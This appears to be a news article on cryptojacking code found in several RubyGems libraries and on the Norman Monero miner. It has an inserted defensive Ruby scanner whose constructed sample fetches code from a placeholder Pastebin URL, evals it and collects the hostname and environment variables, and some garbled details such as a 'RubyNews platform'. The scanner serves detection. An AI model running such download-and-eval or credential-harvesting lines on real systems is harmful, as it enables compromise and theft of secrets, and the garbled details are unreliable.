Cryptojacking code has been discovered in several open-source code libraries written in Ruby, and it seems to have spread rather rapidly.
According to a report by the tech news outlet Decrypt, RubyGems, the package manager for the Ruby programming language, was seemingly corrupted by malicious software that was downloaded and installed by hackers. After infecting the code libraries, the hackers were said to have reposted them on the RubyNews platform, leaving anyone who downloads the code vulnerable.
The malicious code was first noticed by a GitHub user, who published a complaint about the issue earlier this week. In his post, the user explained that the library began to download additional code from Pastebin, a popular text hosting service. This download, according to the post, is what initiates the malware.
The malware will essentially send the address of the infected host to the attackers, as well as other “environmental variables,” which could include some private credentials. As far as solutions go, some users have suggested that contributors to RubyGems could enable two-factor authentication on their accounts.
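As an added illustration of the defensive side (not code from the article, from Decrypt, or from the GitHub post), the following Ruby script scans installed gems for source patterns matching the behaviour described above: downloads from Pastebin, evaluation of dynamically obtained code, and collection of the hostname and environment variables. The indicator patterns and the sample snippet are assumptions constructed for this example, not the actual malicious code; a hit is a lead for manual review, not proof of compromise.

```ruby
# Added example, not from the article: heuristic scan of installed gems for
# the behaviour the post describes (fetch from a paste site, eval downloaded
# code, harvest hostname and environment variables).
require 'rubygems'

# Indicator patterns are assumptions for this example, not the real gem's code.
INDICATORS = {
  paste_site_url: %r{https?://(?:www\.)?pastebin\.com/raw/}i,
  dynamic_eval:   /\b(?:eval|instance_eval|class_eval)\s*\(/,
  env_harvest:    /\bENV\.(?:to_h|to_a|each|map|inspect)\b/,
  host_identity:  /\bSocket\.gethostname\b/
}.freeze

# Scan one chunk of Ruby source; returns [[indicator, line_no, line], ...].
def suspicious_lines(source)
  hits = []
  source.each_line.with_index(1) do |line, no|
    INDICATORS.each do |name, re|
      hits << [name, no, line.strip] if line.match?(re)
    end
  end
  hits
end

# Walk every installed gem's .rb files; returns { gem_full_name => [[path, indicator, line_no, line], ...] }.
def scan_installed_gems
  findings = {}
  Gem::Specification.each do |spec|
    Dir.glob(File.join(spec.full_gem_path, '**', '*.rb')).each do |path|
      hits = suspicious_lines(File.binread(path))
      next if hits.empty?
      (findings[spec.full_name] ||= []).concat(hits.map { |h| [path, *h] })
    end
  end
  findings
end

# Constructed sample mimicking the described behaviour (not real malware).
SAMPLE = <<~RUBY
  require 'net/http'
  require 'socket'
  payload = Net::HTTP.get(URI('https://pastebin.com/raw/EXAMPLEID'))
  eval(payload)
  report = { host: Socket.gethostname, env: ENV.to_h }
RUBY

if __FILE__ == $PROGRAM_NAME
  suspicious_lines(SAMPLE).each { |name, no, line| puts "#{name} line #{no}: #{line}" }
end
```

Run `scan_installed_gems` on a workstation to get a per-gem list of lines worth reading; the sample shows the four indicator types firing on lines 3, 4 and 5.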
Decrypt noted that 5 of the 11 affected libraries were specific to cryptocurrencies. They had names such as doge-coin, bitcoin_vanity, coin_base, and blockchain_wallet. It further noted that coin_base and blockchain_wallet were uploaded as far back as last month. coin_base had already been downloaded up to 424 times, while blockchain_wallet had 423 downloads.
It added that thousands of people have already been exposed to the malware, although an exact number couldn’t be given. Decrypt also admitted that it wasn’t sure whether the attackers had been able to steal any cryptocurrency with the malware.
Cryptojacking has actually been in the news recently. With this theft method, attackers have been able to get rich by capitalizing on people who buy cryptocurrency, on Bitcoin miners, and on high-powered computers. However, even within cryptojacking there are levels of threat. The most significant of these malware families would have to be Norman, a cryptojacking malware that mines the privacy-focused altcoin Monero (XMR), a popular currency on cryptocurrency exchanges.
Norman was discovered just last week, according to a research report from the cybersecurity firm Varonis. In the report, Varonis detailed that they discovered the malware after being called in to perform clean-up after a cyberattack that affected a mid-sized company. The malware is reportedly based on XMRig, a high-performance miner for XMR.
However, its standout feature is its ability to evade detection. Varonis revealed that Norman closes its crypto mining process automatically as soon as it detects that the host user has opened the computer’s Task Manager.
Once the user “cleans up” the computer and is satisfied, the Task Manager is closed, and Norman gets right back to work.
The researchers also concluded that Norman is based on the PHP programming language, and it employs Zend Guard to help keep its operations under wraps. They also reportedly found French variables and functions in the virus’ code, prompting them to believe that it was developed by hackers from France (or at the very least, a French-speaking country).